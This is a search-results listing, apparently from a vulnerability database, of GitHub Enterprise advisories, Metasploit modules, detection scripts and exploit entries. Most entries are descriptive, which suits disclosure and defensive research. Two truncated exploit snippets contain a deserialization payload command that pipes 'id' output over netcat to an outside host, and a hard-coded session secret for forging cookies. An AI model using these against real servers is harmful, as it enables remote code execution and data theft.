930 matches found
CVE-2020-10518 Unsafe configuration options in GitHub Pages leading to remote code execution on GitHub Enterprise Server
A remote code execution vulnerability was identified in GitHub Enterprise Server that could be exploited when building a GitHub Pages site. User-controlled configuration of the underlying parsers used by GitHub Pages were not sufficiently restricted and made it possible to execute commands on the...
CVE-2020-10516
An improper access control vulnerability was identified in the GitHub Enterprise Server API that allowed an organization member to escalate permissions and gain access to unauthorized repositories within an organization. This vulnerability affected all versions of GitHub Enterprise Server prior t...
CVE-2017-18365
The Management Console in GitHub Enterprise 2.8.x before 2.8.7 has a deserialization issue that allows unauthenticated remote attackers to execute arbitrary code. This occurs because the enterprise session secret is always the same, and can be found in the product's source code. By sending a...
Deserialization of untrusted data
The Management Console in GitHub Enterprise 2.8.x before 2.8.7 has a deserialization issue that allows unauthenticated remote attackers to execute arbitrary code. This occurs because the enterprise session secret is always the same, and can be found in the product's source code. By sending a...
CVE-2017-18365
The Management Console in GitHub Enterprise 2.8.x before 2.8.7 has a deserialization issue that allows unauthenticated remote attackers to execute arbitrary code. This occurs because the enterprise session secret is always the same, and can be found in the product's source code. By sending a...
CVE-2017-18365
GitHub Enterprise 2.8.x before 2.8.7’s Management Console is affected by a deserialization vulnerability that enables unauthenticated remote code execution. The root cause is a constant enterprise session secret present in the source, allowing a crafted cookie signed with that secret to trigger M...
SSRFmap - Automatic SSRF Fuzzer And Exploitation Tool
SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz. Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform...
Git-All-Secrets - A Tool To Capture All The Git Secrets By Leveraging Multiple Open Source Git Searching Tools
git-all-secrets is a tool that can: Clone multiple public/private github repositories of an organization and scan them, Clone multiplepublic/private github repositories of a user that belongs to an organization and scan them, Clone a single public/private repository of an organization and scan it...
GitHub Enterprise Management Console RCE
GitHub Enterprise contains a flaw in the management console that is due to Ruby on Rails using a static session secret, which can allow a remote attacker to forge cookies. These cookies are insecurely deserialized, potentially allowing the execution of arbitrary code. C Tenable Network Security,...
SSRF, Memcached and other key-value injections in the wild
Back in 2012 we released SSRF a different techniques to exploit Memcached servers and other services with host-based authentication through SSRF. Two years after, in 2014, I presented a Memcached injection techniques at Black Hat USA . There I mentioned that it’s possible to exploit it as a Remot...
GitHub Enterprise < 2.8.7 - Remote Code Execution Exploit
Exploit for multiple platform in category web applications !/usr/bin/python from urllib import quote ''' set up the marshal payload from IRB code = "id | nc orange.tw 12345" p "\x04\x08" + "o"+":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy"+"\x07" + ":\email protected" +...
GitHub Enterprise < 2.8.10 Multiple Vulnerabilities
GitHub Enterprise is prone to multiple vulnerabilities. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:github:githubenterprise";...
GitHub Enterprise Detection (Linux/Unix SSH Login)
SSH login-based detection of GitHub Enterprise. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only if description...
Github Enterprise Default Session Secret And Deserialization Exploit
This Metasploit module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6. The first is that the session management uses a hard-coded secret value, which can be abused to sign a serialized malicious Ruby object. The second problem is due to the use of unsafe deserialization,...
Github Enterprise Default Session Secret And Deserialization
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Github Enterprise Default Session Secret And Deserialization Vulnerability", 'Description' = %q This module exploits two securi...
Github Enterprise - Default Session Secret and Deserialization (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Github Enterprise Default Session Secret And Deserialization Vulnerability", 'Description' = %q This module exploits two securi...
Github Enterprise Default Session Secret And Deserialization Vulnerability
This module exploits two security issues in Github Enterprise, version 2.8.0 - 2.8.6. The first is that the session management uses a hard-coded secret value, which can be abused to sign a serialized malicious Ruby object. The second problem is due to the use of unsafe deserialization, which allo...
GitHub Enterprise WebGUI / Management Console Detection (HTTP)
HTTP based detection of the GitHub Enterprise WebGUI or Management Console. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
GitHub Enterprise 2.8.x < 2.8.7 Management Console RCE Vulnerability - Active Check
GitHub Enterprise suffer from a remote code execution RCE vulnerability. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...
GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution Exploit
Exploit for ruby platform in category web applications !/usr/bin/ruby require "openssl" require "cgi" require "net/http" require "uri" SECRET = "641dd6454584ddabfed6342cc66281fb" puts ' . . ' puts ' \ | | | ' puts '/ \\ / /\ \ | | | | | / \ ' puts '\ / /\ \ / /// \ ' puts ' / / / / / '...